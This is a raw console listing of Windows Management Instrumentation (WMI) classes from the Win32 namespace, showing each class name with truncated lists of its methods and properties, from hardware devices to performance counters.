{Caption, CreationClassName, Description, DeviceType...} Win32_BaseBoard {IsCompatible} {Caption, ConfigOptions, CreationClassName, Depth...} Win32_SystemEnclosure {IsCompatible} {AudibleAlarm, BreachDescription, CableManagementStrategy, Caption...} Win32_PhysicalMemoryArray {IsCompatible} {Caption, CreationClassName, Depth, Description...} Win32_SystemSlot {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...} Win32_PortConnector {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...} Win32_Thread {} {Caption, CreationClassName, CSCreationClassName, CSName...} Win32_COMApplication {} {Caption, Description, InstallDate, Name...} Win32_DCOMApplication {} {AppID, Caption, Description, InstallDate...} Win32_ScheduledJob {Create, Delete} {Caption, Command, DaysOfMonth, DaysOfWeek...} Win32_PrintJob {Pause, Resume} {Caption, Color, DataType, Description...} Win32_ServerSession {} {ActiveTime, Caption, ClientType, ComputerName...} Win32_ComputerSystem {SetPowerState, R... {AdminPasswordStatus, AutomaticManagedPagefile, AutomaticResetBootOption, AutomaticResetCapability...} Win32_NTDomain {} {Caption, ClientSiteName, CreationClassName, DcSiteName...} Win32_SoftwareFeature {Reinstall, Confi... {Accesses, Attributes, Caption, Description...} Win32_TemperatureProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} Win32_VoltageProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} Win32_CurrentProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...} Win32_Bus {SetPowerState, R... {Availability, BusNum, BusType, Caption...} Win32_Keyboard {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_DesktopMonitor {SetPowerState, R... {Availability, Bandwidth, Caption, ConfigManagerErrorCode...} Win32_PointingDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_USBHub {SetPowerState, R... {Availability, Caption, ClassCode, ConfigManagerErrorCode...} Win32_NetworkAdapter {SetPowerState, R... {AdapterType, AdapterTypeId, AutoSense, Availability...} Win32_Battery {SetPowerState, R... {Availability, BatteryRechargeTime, BatteryStatus, Caption...} Win32_PortableBattery {SetPowerState, R... {Availability, BatteryStatus, CapacityMultiplier, Caption...} Win32_SoundDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_MotherboardDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_DiskDrive {SetPowerState, R... {Availability, BytesPerSector, Capabilities, CapabilityDescriptions...} Win32_FloppyDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_TapeDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_CDROMDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_PnPEntity {SetPowerState, R... {Availability, Caption, ClassGuid, CompatibleID...} Win32_POTSModem {SetPowerState, R... {AnswerMode, AttachedTo, Availability, BlindOff...} Win32_HeatPipe {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...} Win32_Refrigeration {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...} Win32_Fan {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...} Win32_Printer {SetPowerState, R... {Attributes, Availability, AvailableJobSheets, AveragePagesPerMinute...} Win32_SCSIController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_InfraredDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_PCMCIAController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_FloppyController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_VideoController {SetPowerState, R... {AcceleratorCapabilities, AdapterCompatibility, AdapterDACType, AdapterRAM...} Win32_USBController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_SerialPort {SetPowerState, R... {Availability, Binary, Capabilities, CapabilityDescriptions...} Win32_ParallelPort {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...} Win32_IDEController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_1394Controller {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...} Win32_CacheMemory {SetPowerState, R... {Access, AdditionalErrorData, Associativity, Availability...} Win32_Volume {SetPowerState, R... {Access, Automount, Availability, BlockSize...} Win32_SMBIOSMemory {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...} Win32_MemoryArray {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...} Win32_MemoryDevice {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...} Win32_LogicalDisk {SetPowerState, R... {Access, Availability, BlockSize, Caption...} Win32_MappedLogicalDisk {SetPowerState, R... {Access, Availability, BlockSize, Caption...} Win32_DiskPartition {SetPowerState, R... {Access, Availability, BlockSize, Bootable...} Win32_Processor {SetPowerState, R... {AddressWidth, Architecture, Availability, Caption...} Win32_OptionalFeature {} {Caption, Description, InstallDate, InstallState...} Win32_DfsNode {Create} {Caption, Description, InstallDate, Name...} Win32_ComponentCategory {} {Caption, CategoryId, Description, InstallDate...} Win32_ProgramGroupOrItem {} {Caption, Description, InstallDate, Name...} Win32_LogicalProgramGroupItem {} {Caption, Description, InstallDate, Name...} Win32_LogicalProgramGroup {} {Caption, Description, GroupName, InstallDate...} Win32_NetworkConnection {} {AccessMask, Caption, Comment, ConnectionState...} Win32_COMClass {} {Caption, Description, InstallDate, Name...} Win32_ClassicCOMClass {} {Caption, ComponentId, Description, InstallDate...} Win32_Account {} {Caption, Description, Domain, InstallDate...} Win32_UserAccount {Rename} {AccountType, Caption, Description, Disabled...} Win32_Group {Rename} {Caption, Description, Domain, InstallDate...} Win32_SystemAccount {} {Caption, Description, Domain, InstallDate...} Win32_BaseService {StartService, St... {AcceptPause, AcceptStop, Caption, CreationClassName...} Win32_SystemDriver {StartService, St... {AcceptPause, AcceptStop, Caption, CreationClassName...} Win32_Service {StartService, St... {AcceptPause, AcceptStop, Caption, CheckPoint...} Win32_TerminalService {StartService, St... {AcceptPause, AcceptStop, Caption, CheckPoint...} Win32_PnPSignedDriver {StartService, St... {Caption, ClassGuid, CompatID, CreationClassName...} Win32_ApplicationService {StartService, St... {Caption, CreationClassName, Description, InstallDate...} Win32_PrinterDriver {StartService, St... {Caption, ConfigFile, CreationClassName, DataFile...} Win32_TCPIPPrinterPort {} {ByteCount, Caption, CreationClassName, Description...} Win32_CommandLineAccess {} {Caption, CommandLine, CreationClassName, Description...} Win32_SystemMemoryResource {} {Caption, CreationClassName, CSCreationClassName, CSName...} Win32_PortResource {} {Alias, Caption, CreationClassName, CSCreationClassName...} Win32_DeviceMemoryAddress {} {Caption, CreationClassName, CSCreationClassName, CSName...} Win32_IRQResource {} {Availability, Caption, CreationClassName, CSCreationClassName...} Win32_Environment {} {Caption, Description, InstallDate, Name...} Win32_DMAChannel {} {AddressSize, Availability, BurstMode, ByteMode...} Win32_Share {Create, SetShare... {AccessMask, AllowMaximum, Caption, Description...} Win32_ClusterShare {Create, SetShare... {AccessMask, AllowMaximum, Caption, Description...} Win32_NetworkProtocol {} {Caption, ConnectionlessService, Description, GuaranteesDelivery...} Win32_ShadowProvider {} {Caption, CLSID, Description, ID...} Win32_QuickFixEngineering {} {Caption, CSName, Description, FixComments...} Win32_IP4RouteTable {} {Age, Caption, Description, Destination...} Win32_ShadowCopy {Create, Revert} {Caption, ClientAccessible, Count, Description...} Win32_LoadOrderGroup {} {Caption, Description, DriverEnabled, GroupOrder...} Win32_Process {Create, Terminat... {Caption, CommandLine, CreationClassName, CreationDate...} Win32_Session {} {Caption, Description, InstallDate, Name...} Win32_LogonSession {} {AuthenticationPackage, Caption, Description, InstallDate...} Win32_ServerConnection {} {ActiveTime, Caption, ComputerName, ConnectionID...} Win32_DfsTarget {} {Caption, Description, InstallDate, LinkName...} Win32_NetworkClient {} {Caption, Description, InstallDate, Manufacturer...} Win32_PageFileUsage {} {AllocatedBaseSize, Caption, CurrentUsage, Description...} Win32_OperatingSystem {Reboot, Shutdown... {BootDevice, BuildNumber, BuildType, Caption...} Win32_Directory {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_ShortcutFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_CodecFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_NTEventlogFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_PageFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...} Win32_IP4PersistedRouteTable {} {Caption, Description, Destination, InstallDate...} Win32_Registry {} {Caption, CurrentSize, Description, InstallDate...} Win32_BIOS {} {BiosCharacteristics, BIOSVersion, BuildNumber, Caption...} Win32_SoftwareElement {} {Attributes, BuildNumber, Caption, CodeSet...} Win32_ShortcutSAP {} {Action, Element} Win32_MethodParameterClass {} {} Win32_ProcessStartup {} {CreateFlags, EnvironmentVariables, ErrorMode, FillAttribute...} Win32_PingStatus {} {Address, BufferSize, NoFragmentation, PrimaryAddressResolutionStatus...} Win32_SoftwareElementCheck {} {Check, Element, Phase} Win32_ODBCDriverSoftwareElement {} {Check, Element, Phase} Win32_SystemServices {} {GroupComponent, PartComponent} Win32_SystemNetworkConnections {} {GroupComponent, PartComponent} Win32_SystemResources {} {GroupComponent, PartComponent} Win32_SystemBIOS {} {GroupComponent, PartComponent} Win32_SystemLoadOrderGroups {} {GroupComponent, PartComponent} Win32_SystemUsers {} {GroupComponent, PartComponent} Win32_SystemOperatingSystem {} {GroupComponent, PartComponent, PrimaryOS} Win32_SystemDevices {} {GroupComponent, PartComponent} Win32_ComputerSystemProcessor {} {GroupComponent, PartComponent} Win32_SystemPartitions {} {GroupComponent, PartComponent} Win32_SystemSystemDriver {} {GroupComponent, PartComponent} Win32_SystemProcesses {} {GroupComponent, PartComponent} Win32_COMApplicationClasses {} {GroupComponent, PartComponent} Win32_ClassicCOMApplicationClasses {} {GroupComponent, PartComponent} Win32_UserInDomain {} {GroupComponent, PartComponent} Win32_LoadOrderGroupServiceMembers {} {GroupComponent, PartComponent} Win32_LogicalDiskRootDirectory {} {GroupComponent, PartComponent} Win32_SoftwareFeatureSoftwareEle... {} {GroupComponent, PartComponent} Win32_MemoryDeviceArray {} {GroupComponent, PartComponent} Win32_GroupInDomain {} {GroupComponent, PartComponent} Win32_GroupUser {} {GroupComponent, PartComponent} Win32_ProgramGroupContents {} {GroupComponent, PartComponent} Win32_SubDirectory {} {GroupComponent, PartComponent} Win32_PhysicalMemoryLocation {} {GroupComponent, LocationWithinContainer, PartComponent} Win32_FolderRedirectionUserConfi... {} {AppDataRoaming, Contacts, Desktop, Documents...} Win32_Reliability {} {} Win32_ReliabilityStabilityMetrics {GetRecordCount} {EndMeasurementDate, RelID, StartMeasurementDate, SystemStabilityIndex...} Win32_ReliabilityRecords {GetRecordCount} {ComputerName, EventIdentifier, InsertionStrings, Logfile...} Win32_NTLogEventLog {} {Log, Record} Win32_DiskQuota {} {DiskSpaceUsed, Limit, QuotaVolume, Status...} Win32_ComClassAutoEmulator {} {NewVersion, OldVersion} Win32_FolderRedirectionHealthCon... {} {LastSyncDurationCautionInHours, LastSyncDurationUnhealthyInHours} Win32_ComClassEmulator {} {NewVersion, OldVersion} Win32_SoftwareFeatureAction {} {Action, Element} Win32_NamedJobObjectActgInfo {} {ActiveProcesses, Caption, Description, Name...} Win32_Perf {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_SecuritySettingGroup {} {Group, SecuritySetting} Win32_LogicalFileGroup {} {Group, SecuritySetting} Win32_DCOMApplicationLaunchAllow... {} {Element, Setting} Win32_SecuritySettingAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_LogicalFileAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_LogicalShareAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_SoftwareElementAction {} {Action, Element} Win32_ApplicationCommandLine {} {Antecedent, Dependent} Win32_SubSession {} {Antecedent, Dependent} Win32_ShadowVolumeSupport {} {Antecedent, Dependent} Win32_DeviceBus {} {Antecedent, Dependent} Win32_SessionConnection {} {Antecedent, Dependent} Win32_ShadowFor {} {Antecedent, Dependent} Win32_LogonSessionMappedDisk {} {Antecedent, Dependent} Win32_PrinterShare {} {Antecedent, Dependent} Win32_PnPSignedDriverCIMDataFile {} {Antecedent, Dependent} Win32_ConnectionShare {} {Antecedent, Dependent} Win32_LoadOrderGroupServiceDepen... {} {Antecedent, Dependent} Win32_SessionResource {} {Antecedent, Dependent} Win32_SessionProcess {} {Antecedent, Dependent} Win32_AssociatedProcessorMemory {} {Antecedent, BusSpeed, Dependent} Win32_SoftwareFeatureParent {} {Antecedent, Dependent} Win32_ShadowOn {} {Antecedent, Dependent} Win32_PrinterDriverDll {} {Antecedent, Dependent} Win32_DependentService {} {Antecedent, Dependent, TypeOfDependency} Win32_LogicalDiskToPartition {} {Antecedent, Dependent, EndingAddress, StartingAddress} Win32_OperatingSystemQFE {} {Antecedent, Dependent} Win32_LoggedOnUser {} {Antecedent, Dependent} Win32_SystemDriverPNPEntity {} {Antecedent, Dependent} Win32_DfsNodeTarget {} {Antecedent, Dependent} Win32_CIMLogicalDeviceCIMDataFile {} {Antecedent, Dependent, Purpose, PurposeDescription} Win32_SCSIControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_POTSModemToSerialPort {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_USBControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_PrinterController {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_IDEControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_ControllerHasHub {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_1394ControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_DriverForDevice {} {Antecedent, Dependent} Win32_LogicalProgramGroupItemDat... {} {Antecedent, Dependent} Win32_PNPAllocatedResource {} {Antecedent, Dependent} Win32_DiskDrivePhysicalMedia {} {Antecedent, Dependent} Win32_MemoryDeviceLocation {} {Antecedent, Dependent} Win32_MemoryArrayLocation {} {Antecedent, Dependent} Win32_ShadowBy {} {Antecedent, Dependent} Win32_AllocatedResource {} {Antecedent, Dependent} Win32_DiskDriveToDiskPartition {} {Antecedent, Dependent} Win32_LogicalProgramGroupDirectory {} {Antecedent, Dependent} Win32_ShadowDiffVolumeSupport {} {Antecedent, Dependent} Win32_Product {Install, Admin, ... {AssignmentType, Caption, Description, HelpLink...} Win32_ComputerSystemProduct {} {Caption, Description, IdentifyingNumber, Name...} Win32_ProductCheck {} {Check, Product} Win32_NTLogEventUser {} {Record, User} Win32_ProtocolBinding {} {Antecedent, Dependent, Device} Win32_NamedJobObjectLimit {} {Collection, Setting} Win32_NamedJobObjectSecLimit {} {Collection, Setting} Win32_NTLogEventComputer {} {Computer, Record} Win32_TokenGroups {} {GroupCount, Groups} Win32_DefragAnalysis {} {AverageFileSize, AverageFragmentsPerFile, AverageFreeSpacePerExtent, ClusterSize...} Win32_SIDandAttributes {} {Attributes, SID} Win32_CheckCheck {} {Check, Location} Win32_RoamingProfileBackgroundUp... {} {Interval, SchedulingMethod, Time} Win32_RoamingProfileSlowLinkParams {} {ConnectionTransferRate, TimeOut} Win32_SecuritySettingAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_LogicalFileAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_LogicalShareAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_OfflineFilesHealth {} {LastSuccessfulSyncTime, LastSyncStatus, LastSyncTime, OfflineAccessEnabled...} Win32_PerfFormattedData_ADWS_ADWS {} {ActiveWebServiceSessions, AllocatedConnections, Caption, ChangeOptionalFeatureOperationsPerSecond...} Win32_PerfRawData_ADWS_ADWS {} {ActiveWebServiceSessions, AllocatedConnections, Caption, ChangeOptionalFeatureOperationsPerSecond...} Win32_PerfFormattedData_AFDCount... {} {Caption, Description, DroppedDatagrams, DroppedDatagramsPersec...} Win32_PerfRawData_AFDCounters_Mi... {} {Caption, Description, DroppedDatagrams, DroppedDatagramsPersec...} Win32_PerfFormattedData_Authoriz... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_AuthorizationM... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_BITS_BIT... {} {BITSDownloadBlockSizeBytes, BITSDownloadResponseIntervalmsec, Caption, Description...} Win32_PerfRawData_BITS_BITSNetUt... {} {BITSDownloadBlockSizeBytes, BITSDownloadResponseIntervalmsec, Caption, Description...} Win32_PerfFormattedData_Counters... {} {AAAAqueriesFailed, AAAAqueriesSuccessful, AAAASynthesizedrecords, Caption...} Win32_PerfRawData_Counters_DNS64... {} {AAAAqueriesFailed, AAAAqueriesSuccessful, AAAASynthesizedrecords, Caption...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Event... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {BufferMemoryUsageNonPagedPool, BufferMemoryUsagePagedPool, Caption, Description...} Win32_PerfRawData_Counters_Event... {} {BufferMemoryUsageNonPagedPool, BufferMemoryUsagePagedPool, Caption, Description...} Win32_PerfFormattedData_Counters... {} {Caption, Description, FileSystemBytesRead, FileSystemBytesWritten...} Win32_PerfRawData_Counters_FileS... {} {Caption, Description, FileSystemBytesRead, FileSystemBytesWritten...} Win32_PerfFormattedData_Counters... {} {AuthIPMainModeNegotiationTime, AuthIPQuickModeNegotiationTime, Caption, Description...} Win32_PerfRawData_Counters_Gener... {} {AuthIPMainModeNegotiationTime, AuthIPQuickModeNegotiationTime, Caption, Description...} Win32_PerfFormattedData_Counters... {} {Caption, CurrentUrisCached, Description, Frequency_Object...} Win32_PerfRawData_Counters_HTTPS... {} {Caption, CurrentUrisCached, Description, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {ArrivalRate, CacheHitRate, Caption, CurrentQueueSize...} Win32_PerfRawData_Counters_HTTPS... {} {ArrivalRate, CacheHitRate, Caption, CurrentQueueSize...} Win32_PerfFormattedData_Counters... {} {AllRequests, BytesReceivedRate, BytesSentRate, BytesTransferredRate...} Win32_PerfRawData_Counters_HTTPS... {} {AllRequests, BytesReceivedRate, BytesSentRate, BytesTransferredRate...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Hyper... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, Description, DropsNeighborresolutiontimeouts, ErrorsAuthenticationErrors...} Win32_PerfRawData_Counters_IPHTT... {} {Caption, Description, DropsNeighborresolutiontimeouts, ErrorsAuthenticationErrors...} Win32_PerfFormattedData_Counters... {} {Bytesreceivedonthissession, Bytessentonthissession, Caption, Description...} Win32_PerfRawData_Counters_IPHTT... {} {Bytesreceivedonthissession, Bytessentonthissession, Caption, Description...} Win32_PerfFormattedData_Counters... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...} Win32_PerfRawData_Counters_IPsec... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...} Win32_PerfFormattedData_Counters... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...} Win32_PerfRawData_Counters_IPsec... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_IPsec... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, CurrentStateEntries, Description, Frequency_Object...} Win32_PerfRawData_Counters_IPsec... {} {Caption, CurrentStateEntries, Description, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {ActiveSecurityAssociations, BytesReceivedinTransportModePersec, BytesReceivedinTunnelModePersec, BytesSentinTransportModePersec...} Win32_PerfRawData_Counters_IPsec... {} {ActiveSecurityAssociations, BytesReceivedinTransportModePersec, BytesReceivedinTunnelModePersec, BytesSentinTransportModePersec...} Win32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfFormattedData_Counters... {} {Caption, Description, FailedRequests, Frequency_Object...} Win32_PerfRawData_Counters_KPSSVC {} {Caption, Description, FailedRequests, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {AverageSemaphoreHoldTime, Caption, Description, Frequency_Object...} Win32_PerfRawData_Counters_Netlogon {} {AverageSemaphoreHoldTime, AverageSemaphoreHoldTime_Base, Caption, Description...} Win32_PerfFormattedData_Counters... {} {Bytestransmitted, BytestransmittedPersec, Caption, Description...} Win32_PerfRawData_Counters_Netwo... {} {Bytestransmitted, BytestransmittedPersec, Caption, Description...} Win32_PerfFormattedData_Counters... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Bytesscheduled...} Win32_PerfRawData_Counters_Pacer... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Bytesscheduled...} Win32_PerfFormattedData_Counters... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Caption...} Win32_PerfRawData_Counters_Pacer... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Caption...} Win32_PerfFormattedData_Counters... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...} Win32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...} Win32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...} Win32_PerfFormattedData_Counters... {} {Caption, Description, DevicePowerState, Frequency_Object...} Win32_PerfRawData_Counters_Physi... {} {Caption, Description, DevicePowerState, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {ActivityHostManagerhostprocessespoolsize, ActivityHostManagerNumberofbusyhostprocesses, ActivityHostManagerNumberofcreatedhostprocesses, Acti... Win32_PerfRawData_Counters_Power... {} {ActivityHostManagerhostprocessespoolsize, ActivityHostManagerNumberofbusyhostprocesses, ActivityHostManagerNumberofcreatedhostprocesses, Acti... Win32_PerfFormattedData_Counters... {} {AverageIdleTime, C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec...} Win32_PerfRawData_Counters_Proce... {} {AverageIdleTime, AverageIdleTime_Base, C1TransitionsPersec, C2TransitionsPersec...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_RDMAA... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {AverageEncodingTime, Caption, Description, FrameQuality...} Win32_PerfRawData_Counters_Remot... {} {AverageEncodingTime, Caption, Description, FrameQuality...} Win32_PerfFormattedData_Counters... {} {BaseTCPRTT, BaseUDPRTT, Caption, CurrentTCPBandwidth...} Win32_PerfRawData_Counters_Remot... {} {BaseTCPRTT, BaseUDPRTT, Caption, CurrentTCPBandwidth...} Win32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...} Win32_PerfRawData_Counters_SMBCl... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...} Win32_PerfFormattedData_Counters... {} {BytesRDMAReadPersec, BytesRDMAWrittenPersec, BytesReceivedPersec, BytesSentPersec...} Win32_PerfRawData_Counters_SMBDi... {} {BytesRDMAReadPersec, BytesRDMAWrittenPersec, BytesReceivedPersec, BytesSentPersec...} Win32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...} Win32_PerfRawData_Counters_SMBSe... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...} Win32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...} Win32_PerfRawData_Counters_SMBSe... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...} Win32_PerfFormattedData_Counters... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...} Win32_PerfRawData_Counters_Synch... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...} Win32_PerfFormattedData_Counters... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...} Win32_PerfRawData_Counters_Synch... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Therm... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_WFP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...} Win32_PerfRawData_Counters_WFPv4 {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...} Win32_PerfFormattedData_Counters... {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...} Win32_PerfRawData_Counters_WFPv6 {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...} Win32_PerfFormattedData_Counters... {} {ActiveOperations, ActiveShells, ActiveUsers, Caption...} Win32_PerfRawData_Counters_WSMan... {} {ActiveOperations, ActiveShells, ActiveUsers, Caption...} Win32_PerfFormattedData_Counters... {} {AllocationCount, Caption, Description, FreeCount...} Win32_PerfRawData_Counters_XHCIC... {} {AllocationCount, Caption, Description, FreeCount...} Win32_PerfFormattedData_Counters... {} {Caption, Description, DpcRequeueCount, DPCsPersec...} Win32_PerfRawData_Counters_XHCII... {} {Caption, Description, DpcRequeueCount, DPCsPersec...} Win32_PerfFormattedData_Counters... {} {BytesPerSec, Caption, Description, FailedTransferCount...} Win32_PerfRawData_Counters_XHCIT... {} {BytesPerSec, Caption, Description, FailedTransferCount...} Win32_PerfFormattedData_DdmCount... {} {BytesReceivedByDisconnectedClients, BytesTransmittedByDisconnectedClients, Caption, Description...} Win32_PerfRawData_DdmCounterProv... {} {BytesReceivedByDisconnectedClients, BytesTransmittedByDisconnectedClients, Caption, Description...} Win32_PerfFormattedData_DFSNServ... {} {Caption, Description, FolderCount, Frequency_Object...} Win32_PerfRawData_DFSNServerServ... {} {Caption, Description, FolderCount, Frequency_Object...} Win32_PerfFormattedData_DFSNServ... {} {AvgResponseTime, Caption, Description, Frequency_Object...} Win32_PerfRawData_DFSNServerServ... {} {AvgResponseTime, AvgResponseTime_Base, Caption, Description...} Win32_PerfFormattedData_DFSNServ... {} {AvgResponseTime, Caption, Description, Frequency_Object...} Win32_PerfRawData_DFSNServerServ... {} {AvgResponseTime, AvgResponseTime_Base, Caption, Description...} 